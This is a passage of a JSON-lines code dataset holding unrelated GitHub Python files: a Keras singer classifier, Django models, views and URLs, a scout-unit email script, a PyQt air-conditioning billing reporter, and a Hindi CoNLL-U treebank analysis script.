'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien'] # the lagu list must match the folder names on Google Drive, one folder per singer\n    for singer in lagu:\n        sound_files = glob.glob('lagu/'+singer+'/*.mp3') # grab every .mp3 file inside each singer's folder under lagu/, matched by extension\n        print('Processing %d songs by %s ...' 
% (len(sound_files), singer))\n        \n        for f in sound_files:\n            features = extract_features_song(f)\n            all_features.append(features)\n            all_labels.append(singer)\n\n    # convert labels to one-hot encoding\n    label_uniq_ids, label_row_ids = np.unique(all_labels, return_inverse=True)\n    label_row_ids = label_row_ids.astype(np.int32, copy=False)\n    onehot_labels = to_categorical(label_row_ids, len(label_uniq_ids))\n    return np.stack(all_features), onehot_labels\n\nfeatures, labels = generate_features_and_labels()\n\nprint(np.shape(features))\nprint(np.shape(labels))\n\ntraining_split = 0.8\n\nalldata = np.column_stack((features, labels))\n\nnp.random.shuffle(alldata)\nsplitidx = int(len(alldata) * training_split)\ntrain, test = alldata[:splitidx,:], alldata[splitidx:,:]\n\nprint(np.shape(train))\nprint(np.shape(test))\n\ntrain_input = train[:,:-10]\ntrain_labels = train[:,-10:]\n\ntest_input = test[:,:-10]\ntest_labels = test[:,-10:]\n\nprint(np.shape(train_input))\nprint(np.shape(train_labels))\n\nprint(np.shape(test_input))\nprint(np.shape(test_labels))\n\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Dense(100, input_dim=np.shape(train_input)[1]))\nmodel.add(tf.keras.layers.Activation('relu'))\nmodel.add(tf.keras.layers.Dense(10))\nmodel.add(tf.keras.layers.Activation('softmax'))\nmodel.compile(optimizer='adam',\n              loss='categorical_crossentropy',\n              metrics=['accuracy'])\nprint(model.summary())\n\nmodel.fit(train_input, train_labels, epochs=10, batch_size=32,\n          validation_split=0.2)\n\nloss, acc = model.evaluate(test_input, test_labels, batch_size=32)\n\nprint(\"Done!\")\nprint(\"Loss: %.4f, accuracy: %.4f\" % (loss, acc))\n\n# save the trained model\nmodel.save(\"singers2.hdf5\")\n\nimport tensorflow as tf\nmodel2 = tf.keras.models.load_model(\"singers2.hdf5\")\nprint(model2.summary())\n\ndef predict(song_path):\n    song = np.stack([extract_features_song(song_path)])\n    # do the prediction\n    prediction = model2.predict(song, batch_size=32)\n\n    print(\"Prediction: %s, confidence: %.2f\" % (np.argmax(prediction), np.max(prediction)))\n\npredict('Uts/lagu/tompi/Tompi - Balonku.mp3')\n\npredict('Uts/lagu/tulus/TULUS - Pamit.mp3')\n\nfrom sklearn.metrics import confusion_matrix\npred_labels = model2.predict(test_input)\ncm = confusion_matrix(test_labels.argmax(axis=1), pred_labels.argmax(axis=1))\ncm\n\nimport matplotlib.pyplot as plt\nimport itertools\ndef plot_confusion_matrix(cm, classes,\n                          normalize=False,\n                          title='Confusion matrix',\n                          cmap=plt.cm.Blues):\n    \"\"\"\n    This function prints and plots the confusion matrix.\n    Normalization can be applied by setting `normalize=True`.\n    \"\"\"\n    if normalize:\n        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n        print(\"Normalized confusion matrix\")\n    else:\n        print('Confusion matrix, without normalization')\n\n    print(cm)\n    plt.figure(figsize=(6,6), dpi=100)\n    plt.imshow(cm, interpolation='nearest', cmap=cmap)\n    plt.title(title)\n    #plt.colorbar()\n    tick_marks = np.arange(len(classes))\n    plt.xticks(tick_marks, classes, rotation=90)\n    plt.yticks(tick_marks, classes)\n    \n    fmt = '.2f' if normalize else 'd'\n    thresh = cm.max() / 2.\n    #for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n    #    plt.text(j, i, format(cm[i, j], fmt),\n    #             horizontalalignment=\"center\",\n    #             color=\"white\" if cm[i, j] > thresh else \"black\")\n\n    plt.tight_layout()\n    plt.ylabel('True label')\n    plt.xlabel('Predicted label')\n\n\nimport numpy as np\n\nlagu = ['viavallen', 'tulus', 'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien']\nplot_confusion_matrix(cm, 
classes=lagu, normalize=True)\nplt.show()","repo_name":"KecerdasanBuatan17/KB3C","sub_path":"uts/1174062/1174062.py","file_name":"1174062.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4779525646","text":"from django.db import models\n\nclass Book(models.Model):\n    title = models.CharField(max_length=200)\n    date_publish = models.DateTimeField(default='')\n    summary = models.TextField(blank=True)\n    country = models.TextField(blank=True)\n    link = models.URLField(blank=True)\n    # string reference avoids a NameError, since Writer is defined elsewhere\n    writer = models.ForeignKey('Writer', on_delete=models.CASCADE)\n\n    def __str__(self):\n        return self.title\n\n    class Meta:\n        ordering = ['title']\n","repo_name":"alaaalshamy/DjangoProject1","sub_path":"DjangoProject/liberary/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71680669551","text":"import pandas as pd\n\nfrom utils import Utils\n\n\nclass Parser(object):\n    def __init__(self, data: dict, key1: str = '21', key2: str = '22'):\n        self._key1 = key1\n        self._key2 = key2\n        self._data = data\n\n    def parse(self):\n        items = self._data['table'].items()\n\n        region_data = []\n\n        for key, value in items:\n            obj = dict({})\n            obj['code'] = key\n            obj['region'] = Utils.get_region_name_by_code(key)\n            obj['value1'] = value[self._key1]\n            obj['value2'] = value[self._key2]\n\n            region_data.append(obj)\n\n        return {\n            'time_server': self._data['ts'],\n            'total_nolsatu': float(self._data['chart'][self._key1]),\n            'total_noldua': float(self._data['chart'][self._key2]),\n            'process_tps': float(self._data['progress']['proses']),\n            'total_tps': float(self._data['progress']['total']),\n            'votings': region_data\n        }\n\n    def parse_to_csv_format(self):\n        items = self._data['table'].items()\n        res = []\n\n        for key, value in items:\n            obj = dict({})\n            obj[Utils.get_region_name_by_code(key)] = {\n                'code': key,\n                'value1': value[self._key1],\n                'value2': value[self._key2]\n            }\n            res.append(obj)\n\n        return res\n","repo_name":"ebysofyan/pantau","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"679247415","text":"\"\"\"Module for generating games by user report\"\"\"\nimport sqlite3\nfrom django.shortcuts import render\nfrom levelupapi.models import Game\nfrom levelupreports.views import Connection\n\ndef usergame_list(request):\n    \"\"\"Function to build an HTML report of games by user\"\"\"\n    if request.method == 'GET':\n        # Connect to project database\n        with sqlite3.connect(Connection.db_path) as conn:\n            conn.row_factory = sqlite3.Row\n            db_cursor = conn.cursor()\n\n            # Query for all games, with related user info\n            db_cursor.execute(\"\"\"\n                SELECT\n                    g.id,\n                    g.name,\n                    g.game_type_id,\n                    g.num_players,\n                    g.skill_level,\n                    u.id user_id,\n                    u.first_name || ' ' || u.last_name AS full_name\n                FROM\n                    levelupapi_game g\n                JOIN\n                    levelupapi_gamer gr ON g.creator_id = gr.id\n                JOIN\n                    auth_user u ON gr.user_id = u.id\n            \"\"\")\n\n            dataset = db_cursor.fetchall()\n\n            games_by_user = {}\n\n            for row in dataset:\n                game = Game()\n                game.name = row['name']\n                game.game_type_id = row['game_type_id']\n                game.num_players = row['num_players']\n                game.skill_level = row['skill_level']\n\n                uid = row['user_id']\n\n                # If we've already encountered this user, add this game to their list of games\n                if uid in
games_by_user:\n games_by_user[uid]['games'].append(game)\n\n # Otherwise add a new key-value pair for this user\n else:\n games_by_user[uid] = {\n \"id\": uid,\n \"full_name\": row[\"full_name\"],\n \"games\": [ game ]\n }\n \n # dict.values() is akin to Object.values(obj) in JS\n list_of_users_with_games = games_by_user.values()\n\n # Specify Django template and provide data context\n template = 'users/list_with_games.html'\n context = {\n 'usergame_list': list_of_users_with_games\n }\n\n return render(request, template, context)\n","repo_name":"skratz17/levelup-server","sub_path":"levelupreports/views/users/gamesbyuser.py","file_name":"gamesbyuser.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6652301045","text":"#!/usr/bin/python2\n\nimport os\nimport getopt\nimport sys\n#import pg\n#import string\nimport dbobj\n#from procs import *\n#import time\n#import datetime\nimport smtplib\nfrom email.MIMEText import MIMEText\nfrom email.MIMEMultipart import MIMEMultipart\n \n\n##############################################################################\ndef main():\n \"\"\"This program is intended to be called from office.py\nObtains the following parameters:\n ou_id\n subject\n msg_body\n user_id - person who sent the message\n\n \"\"\"\n \n error_file = open('/tmp/jim.log', 'w')\n testing = 1\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"\")\n\n param = dbobj.paramrec()\n db = dbobj.dbinstance(param.dbname)\n\n ou_id = int(args[0])\n subject = args[1]\n msg_body = args[2]\n user_id = args[3]\n\n if testing:\n error_file.write(\"OU id = %d, subject = '%s', msg_body = '%s', user_id = %s\\n\" % (ou_id, subject, msg_body, user_id))\n\n ourec = dbobj.ourec(db, ou_id)\n if not ourec.found:\n if testing:\n error_file.write('Error: OU not found - OU id = %d\\n' % ou_id)\n return\n \n maillist = []\n\n # get email addresses of members of ou\n mail_by_ou(ourec, maillist, db, error_file)\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n #Get children ous\n children = ourec.child_list()\n for ch in children:\n mail_by_ou(ch, maillist, db, error_file)\n\n #if testing:\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n\n \n # Get details of the logged in user\n user = dbobj.adultrec(db, user_id) \n if not user.found:\n error_file.write('Error: User not found - User id = %d\\n' % user_id)\n return\n \n maillist.append(user.email)\n \n # Open link to mail server\n mailserver = smtplib.SMTP(param.smtpserver)\n\n\n #Get the html header\n htmlfile = param.template_dir + '/' + param.email_header\n mf = open(htmlfile)\n html_header = mf.read()\n mf.close()\n\n error_file.write('html opened = %s\\n' % htmlfile)\n\n #Get the footer of the email\n footerfile = param.template_dir + '/' + param.email_footer\n mf = open(footerfile)\n html_footer = mf.read()\n mf.close()\n error_file.write('footer opened = %s\\n' % footerfile)\n\n msg_footer = '
%s' % (param.baseurl, param.pythondir, ourec.ou_id, ourec.name)\n\n    error_file.write('Set up mailserver and body\\n')\n\n\n    #Cycle through the mail list\n    for em in maillist:\n        #error_file.write(em)\n        # Create the mail message\n        outer = MIMEMultipart()\n\n        # Mail headers\n        outer['Subject'] = subject\n        #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n        outer['From'] = user.email\n        outer['To'] = em\n        outer.preamble = 'Scout unit mail message'\n        outer.epilogue = ''\n\n        # Attach the created file to the e-mail.\n        msgfile = MIMEText(html_header + msg_body + msg_footer + html_footer, 'html')\n        outer.attach(msgfile)\n\n        #mailserver.set_debuglevel(1)\n        mailserver.sendmail(user.email, em, outer.as_string())\n        error_file.write('Send email to %s\\n' % em)\n\n    # Send me a copy\n    # Create the mail message\n    outer = MIMEMultipart()\n\n    # Mail headers\n    outer['Subject'] = 'Copy of email to ' + ourec.name\n    #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n    outer['From'] = user.email\n    outer['To'] = 'scout@west.net.nz'\n    outer.preamble = 'Scout unit mail message'\n    outer.epilogue = ''\n\n    html_body = html_header + 'Subject : %s<br>Sent by : %s %s<br>Message body :<br>
%s' %(subject, user.forename, user.surname, msg_body) + html_footer\n\n # Attach the created file to the e-mail.\n msgfile = MIMEText(html_body, 'html')\n outer.attach(msgfile)\n\n #mailserver.set_debuglevel(1)\n mailserver.sendmail(user.email, em, outer.as_string())\n\n\n error_file.write('Finished sending email\\n')\n\n # Finished the loop, close connection to mail server\n mailserver.quit()\n\n error_file.close()\n except:\n error_file = open('/tmp/email_error.log', 'w')\n error_file.write('Error occured')\n error_file.close()\n return\n\n##############################################################################\ndef mail_by_ou(ourec, maillist, db, ef):\n \"\"\"Populates maillist parameter (which must be an array) with unique email addresses of members and parents.\nReceives two parameters\n ourec - the OU being processed\n maillist - the array for email addresses\n\"\"\"\n ef.write('Entered mail_by_ou, ou_id = %d\\n' % ourec.ou_id)\n membs = ourec.member_list(status = 'C')\n\n for s in membs:\n pers = dbobj.scoutrec(db, s.scout_id)\n if pers.found:\n if pers.email is not None and pers.email != '':\n if maillist.count(pers.email) == 0:\n maillist.append(pers.email)\n p1 = dbobj.adultrec(db, pers.parent1)\n if p1.found != 0 and p1.email is not None and p1.email != '':\n if maillist.count(p1.email) == 0:\n maillist.append(p1.email)\n p2 = dbobj.adultrec(db, pers.parent2)\n if p2.found != 0 and p2.email is not None and p2.email != '':\n if maillist.count(p2.email) == 0:\n maillist.append(p2.email)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jimboeri/scout","sub_path":"py/unit-email.py","file_name":"unit-email.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"877893091","text":"__author__ = 'Hk4Fun'\n__date__ = '2018/5/22 23:03'\nimport sys\n\nfrom PyQt5.QtWidgets import (QWidget, QHeaderView, QTableWidgetItem, QInputDialog)\n\nsys.path.append('..')\nfrom AirConditioningV2.ui import ui_Reporter\nfrom AirConditioningV2.ui import ui_Bill\nfrom AirConditioningV2.database import *\nfrom AirConditioningV2.logger import *\nfrom AirConditioningV2.filters import *\n\n\nclass DetailList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.showDetailList()\n\n def showDetailList(self, date=None):\n self.ui.tbDetail.clearContents()\n self.ui.tbDetail.setSortingEnabled(False) # http://doc.qt.io/qt-5/qtablewidget.html#setItem\n self.db.sqlExec('SELECT * FROM detail_list')\n row = 0\n while self.query.next():\n if date and not isEqDate(date, timeFormat(self.query.value(1))): continue\n self.ui.tbDetail.setRowCount(row + 1)\n self.ui.tbDetail.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbDetail.setItem(row, 1, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbDetail.setItem(row, 2, QTableWidgetItem(timeFormat(self.query.value(1))))\n self.ui.tbDetail.setItem(row, 3, QTableWidgetItem(timeFormat(self.query.value(2))))\n self.ui.tbDetail.setItem(row, 4, QTableWidgetItem(durationFormat(self.query.value(1), self.query.value(2))))\n self.ui.tbDetail.setItem(row, 5, QTableWidgetItem(str(self.query.value(4))))\n self.ui.tbDetail.setItem(row, 6, QTableWidgetItem(str(self.query.value(5))))\n self.ui.tbDetail.setItem(row, 7, QTableWidgetItem(str(self.query.value(6))))\n self.ui.tbDetail.setItem(row, 8, QTableWidgetItem(str(self.query.value(7))))\n self.ui.tbDetail.setItem(row, 9, 
QTableWidgetItem(str(self.query.value(8))))\n self.ui.tbDetail.setItem(row, 10, QTableWidgetItem(isSettle(self.query.value(9))))\n row += 1\n self.ui.tbDetail.setSortingEnabled(True)\n\n def saveDetail(self, client):\n sql = 'INSERT INTO detail_list VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, client.roomId)\n self.query.bindValue(1, int(client.openTime))\n self.query.bindValue(2, int(client.closeTime))\n self.query.bindValue(3, client.userLevel)\n self.query.bindValue(4, client.tempAdjust)\n self.query.bindValue(5, client.tempBackCount)\n self.query.bindValue(6, client.speedAdjust)\n self.query.bindValue(7, round(client.energy, 2))\n self.query.bindValue(8, round(client.cost, 2))\n self.query.bindValue(9, '0') # 单号为0表示还未结算\n self.db.sqlExec()\n\n\nclass BillList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.ui.tbBillList.cellDoubleClicked.connect(self.showBill)\n self.showBillList()\n\n def showBillList(self, date=None):\n self.ui.tbBillList.clearContents()\n self.ui.tbBillList.setSortingEnabled(False)\n self.db.sqlExec('SELECT * FROM bill_list')\n totalIncome = 0\n row = 0\n while self.query.next():\n if date and not isEqDate(date, self.query.value(0)): continue\n self.ui.tbBillList.setRowCount(row + 1)\n self.ui.tbBillList.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbBillList.setItem(row, 1, QTableWidgetItem(self.query.value(1)))\n self.ui.tbBillList.setItem(row, 2, QTableWidgetItem(self.query.value(2)))\n self.ui.tbBillList.setItem(row, 3, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbBillList.setItem(row, 4, QTableWidgetItem(str(round(self.query.value(4), 2))))\n self.ui.tbBillList.setItem(row, 5, QTableWidgetItem(discountFormat(self.query.value(5))))\n self.ui.tbBillList.setItem(row, 6, QTableWidgetItem(str(round(self.query.value(6), 2))))\n totalIncome += self.query.value(6)\n row += 1\n self.ui.tbBillList.setSortingEnabled(True)\n self.ui.label_totalIncome.setText(str(round(totalIncome, 2)))\n\n def showBill(self, row):\n orderId = self.ui.tbBillList.item(row, 1).text()\n self.bill = Bill(self.db, orderId)\n self.bill.show()\n\n def addBill(self, orderId, roomId, userLevel, cost):\n sql = 'INSERT INTO bill_list(orderID, roomID, userLevel, cost, discount, receive) VALUES (?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, orderId)\n self.query.bindValue(1, roomId)\n self.query.bindValue(2, userLevel)\n self.query.bindValue(3, cost)\n self.query.bindValue(4, mapDiscount(userLevel))\n self.query.bindValue(5, cost * mapDiscount(userLevel))\n self.db.sqlExec()\n\n\nclass Bill(QWidget):\n def __init__(self, db, orderId):\n super().__init__()\n self.db = db\n self.query = self.db.query\n self.orderId = orderId\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Bill.Ui_Form()\n self.ui.setupUi(self)\n self.ui.btPrinter.clicked.connect(self.printBill)\n self.showBill()\n\n def showBill(self):\n sql = 'SELECT * FROM bill_list WHERE orderID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, self.orderId)\n self.db.sqlExec()\n self.query.next()\n self.ui.label_date.setText(self.query.value(0))\n self.ui.label_orderId.setText(self.query.value(1))\n self.ui.label_roomId.setText(self.query.value(2))\n self.ui.label_userLevel.setText(mapUserLevel_c2w(self.query.value(3)))\n self.ui.label_cost.setText(str(round(self.query.value(4), 2)))\n self.ui.label_discount.setText(discountFormat(self.query.value(5)))\n 
self.ui.label_receive.setText(str(round(self.query.value(6), 2)))\n\n def printBill(self):\n pass\n\n\nclass Reporter(QWidget):\n def __init__(self, db, server):\n super().__init__()\n self.db = db\n self.server = server\n self.query = self.db.query\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Reporter.Ui_Form()\n self.ui.setupUi(self)\n # resize column both on content and stretch\n header = self.ui.tbDetail.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(2, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(3, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(10, QHeaderView.ResizeToContents)\n header = self.ui.tbBillList.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.ui.dateEdit.setDate(QDate.currentDate())\n\n self.ui.btRefresh.clicked.connect(self.slotRefTb)\n self.ui.btSettle.clicked.connect(self.slotSettle)\n self.ui.tabWidget.currentChanged.connect(self.slotChangePage)\n self.ui.dateEdit.dateChanged.connect(self.slotSelectDate)\n\n self.detailList = DetailList(self.ui, self.db)\n self.billList = BillList(self.ui, self.db)\n\n def slotSelectDate(self, date):\n self.detailList.showDetailList(date)\n self.billList.showBillList(date)\n\n def slotRefTb(self):\n self.ui.dateEdit.setDate(QDate.currentDate())\n self.detailList.showDetailList()\n self.billList.showBillList()\n\n def slotChangePage(self, idx):\n self.ui.dateEdit.setDate(QDate.currentDate())\n if idx == 0:\n self.detailList.showDetailList()\n elif idx == 1:\n self.billList.showBillList()\n\n def slotSettle(self):\n roomId, res = QInputDialog.getText(self, '请输入房间号', '房间号')\n if not res: return\n if not roomId:\n msg = '房间号不能为空'\n QMessageBox().warning(self, '房间号为空', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n isOpening, client = self.isOpening(roomId)\n if isOpening:\n msg = '当前房间空调尚未关机,是否强制关机?'\n res = QMessageBox().warning(self, '空调尚未关机', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n if res == QMessageBox.No: return\n self.disClient(client)\n self.detailList.saveDetail(client)\n if self.hasSettled(roomId):\n msg = '该房间号不存在或已结账!'\n QMessageBox().warning(self, '房间号', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n self.settleAccount(roomId)\n\n def hasSettled(self, roomId):\n sql = 'SELECT * FROM detail_list WHERE orderID = \"0\" AND roomID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return False if self.query.value(0) else True\n\n def isOpening(self, roomId):\n for client in self.server.serveQueue + self.server.waitQueue + self.server.tempQueue:\n if client.roomId == roomId:\n return True, client\n return False, None\n\n def disClient(self, client):\n client.room_temp_timer.stop()\n client.energy_timer.stop()\n client.sock.abort()\n client.closeTime = time.time()\n\n def getUserLevel(self, roomId):\n sql = 'SELECT userLevel FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def calcTotalCost(self, roomId):\n sql = 'SELECT SUM(cost) FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def setOrderId(self, roomId):\n orderId = str(int(time.time()))\n sql = 'UPDATE detail_list SET orderID = ? WHERE roomID = ? 
AND orderID = \"0\"'\n        self.db.sqlPrepare(sql)\n        self.query.bindValue(0, orderId)\n        self.query.bindValue(1, roomId)\n        self.db.sqlExec()\n        return orderId\n\n    def settleAccount(self, roomId):\n        userLevel = self.getUserLevel(roomId)\n        cost = self.calcTotalCost(roomId)\n        # start a transaction\n        if self.db.dbh.transaction():\n            orderId = self.setOrderId(roomId)\n            self.billList.addBill(orderId, roomId, userLevel, cost)\n            if not self.db.dbh.commit():\n                logger.error(self.db.dbh.lastError().text())\n                if not self.db.dbh.rollback():\n                    logger.error(self.db.dbh.lastError().text())\n                msg = 'An error occurred during checkout!'\n                QMessageBox().critical(self, 'Checkout failed', msg, QMessageBox.Yes, QMessageBox.Yes)\n                return\n        self.bill = Bill(self.db, orderId)\n        self.bill.show()\n","repo_name":"Hk4Fun/qtstudy","sub_path":"AirConditioningV2/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"38146584232","text":"from django.urls import path\nfrom . import views\n\napp_name = \"users\"\n\nurlpatterns = [\n    path(\"login/\", views.LoginView.as_view(), name=\"login\"),\n    path(\"login/github/\", views.github_login, name=\"github_login\"),\n    path(\"login/github/callback/\", views.github_callback, name=\"github_callback\"),\n    path(\"login/kakao/\", views.kakao_login, name=\"kakao_login\"),\n    path(\"login/kakao/callback/\", views.kakao_callback, name=\"kakao_callback\"),\n    path(\"logout/\", views.logout_view, name=\"logout\"),\n    path(\"signup/\", views.SignUpView.as_view(), name=\"signup\"),\n    path(\n        \"verify//\",\n        views.complete_verification,\n        name=\"complete_verification\",\n    ),\n    path(\"/\", views.UserProfileView.as_view(), name=\"profile\"),\n    path(\"edit-profile/\", views.EditProfileView.as_view(), name=\"edit_profile\"),\n    path(\"password-change/\", views.UpdatePassword.as_view(), name=\"password_change\"),\n    path(\"switch-hosting/\", views.switch_hosting_mode, name=\"switch-hosting\"),\n    path(\"switch-lang/\", views.switch_lang, name=\"switch-lang\"),\n]\n","repo_name":"KJYoung/airbnbV","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"8705389657","text":"# -*- coding: utf-8 -*-\nfrom io import open\nfrom conllu import parse  # needed below for parse(temp)\n\nwith open(\"hindi.conllu\", 'r') as file:\n    temp = file.read()\n\nfrom collections import defaultdict\nimport itertools\nfrom collections import Counter\n\n\"\"\"**Solution 1a**\"\"\"\nprint(\"----------Solution 1a------------\")\ndef freqPOSword(parseText):\n    posTag = defaultdict(int)\n    for sentence in parseText:\n        for word in sentence:\n            # posTag[(word['upos'],word['form'])] += 1\n            posTag[word['upos']] += 1\n    posTag = dict(sorted(posTag.items(), key=lambda item: item[1], reverse=True))\n    # return dict(itertools.islice(posTag.items(), 50))\n    return posTag\n\nparseText = parse(temp)\nposTag = freqPOSword(parseText)\nprint(posTag)\n\n\"\"\"**Solution 1b**\"\"\"\nprint(\"----------Solution 1b------------\")\ndef freq50Pos():\n    freq50most = dict()\n    for sentence in parseText:\n        for word in sentence:\n            wordlist = freq50most.get(word['upos'],[])\n            wordlist.append(word['form'])\n            freq50most[word['upos']] = wordlist\n\n    finaldict = dict()\n    for key, wordlist in freq50most.items():\n        posWord = dict(Counter(wordlist))\n        posWord = dict(sorted(posWord.items(), key=lambda item: item[1], reverse=True))\n        posWord =
dict(itertools.islice(posWord.items(), 50))\n finaldict[key] = posWord\n print(key, posWord)\n return finaldict\n\nfreq50mostdict = freq50Pos()\n\n\"\"\"**Solution 1c** \"\"\"\nprint(\"----------Solution 1c------------\")\ndef findfreqGender(morphfeature):\n genderfreq = defaultdict(int)\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morphfeature,'')\n if genstr != '':\n genderfreq[genstr] += 1\n return genderfreq\n\ngenderfreq = findfreqGender('Gender')\nprint('-------Gender--------')\nfor key, value in genderfreq.items():\n print(key, value)\ngenderfreq = findfreqGender('Case')\nprint('\\n-------Case----------')\nfor key, value in genderfreq.items():\n print(key, value)\nprint('\\n-------Number--------')\ngenderfreq = findfreqGender('Number')\nfor key, value in genderfreq.items():\n print(key, value)\n\n#find freq of Gender, case, number of words \ndef genFreq(morfeature):\n genderfreq = dict()\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morfeature,'')\n if genstr != '':\n genlist = genderfreq.get(genstr,[])\n genlist.append(word['form'])\n genderfreq[genstr] = genlist\n \n finalgenfreq = dict()\n for key, genlist in genderfreq.items():\n finalgenfreq[key] = dict(itertools.islice(dict(sorted(dict(Counter(genlist)).items(), key=lambda item: item[1] ,reverse=True)).items(),50))\n return finalgenfreq\n\ngenderfreq = genFreq('Gender')\nfor key, value in genderfreq.items():\n print(key, value)\n\ncasefreq = genFreq('Case')\nfor key, value in casefreq.items():\n print(key, value)\n\nnumberfreq = genFreq('Number')\nfor key, value in numberfreq.items():\n print(key, value)\n\n\"\"\"**Solution 1d**\"\"\"\nprint(\"----------Solution 1d------------\")\nfreq50Comb = defaultdict(int)\n\nfor sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get('Gender','')\n casestr = featdict.get('Case','')\n numstr = featdict.get('Number','')\n if genstr != '' and casestr != '' and numstr != '':\n freq50Comb[(genstr, casestr, numstr)] += 1\n\nfreq50Comb = dict(sorted(dict(freq50Comb).items(), key=lambda item: item[1] ,reverse=True))\nfreq50Comb\n\n\"\"\"**Solution 1e**\"\"\"\nprint(\"----------Solution 1e------------\")\n\nheaddict = dict()\n\ndef POShead():\n headdict = dict()\n for sentence in parseText:\n for word in sentence:\n if word['misc']['ChunkType'] == 'head':\n headlist = headdict.get(word['upos'], [])\n headlist.append(word['form'])\n headdict[word['upos']] = headlist\n\n finalheaddict = dict()\n for key, headlist in headdict.items():\n headCount = dict(sorted(dict(Counter(headlist)).items(), key=lambda item: item[1] ,reverse=True))\n finalheaddict[key] = headCount\n print(key, headCount)\n return finalheaddict\n\nheaddict = POShead()\n\n\"\"\"**Solution 1f**\"\"\"\nprint(\"----------Solution 1f------------\")\n\ndef getdirectedPOS():\n directedPOS = dict()\n # def getdirectedPOS():\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n # eachlist = directedPOS.get(word['deprel'], [])\n eachlist = directedPOS.get(mytup, [])\n eachlist.append(word['deprel'])\n directedPOS[mytup] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = 
eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndirectedPOS = getdirectedPOS()\n\n# 1.f -> part 1\nallTuples = list(directedPOS.keys())\nprint(allTuples)\n\ntotaldirectedPOS = defaultdict(int)\n\nfor key1, eachlist in directedPOS.items():\n for key2 , eachitem in eachlist.items():\n totaldirectedPOS[key1] += eachitem\n print(key1, totaldirectedPOS[key1])\n\n\"\"\"**Solution 1g**\"\"\"\nprint(\"----------Solution 1g------------\")\n\ndef dependencyR():\n directedPOS = dict()\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n eachlist = directedPOS.get(word['deprel'], [])\n eachlist.append(mytup)\n directedPOS[word['deprel']] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndependencyRfreq = dependencyR()\n\ndepenRtotalfreq = defaultdict(int)\n\nfor key1, eachlist in dependencyRfreq.items():\n for 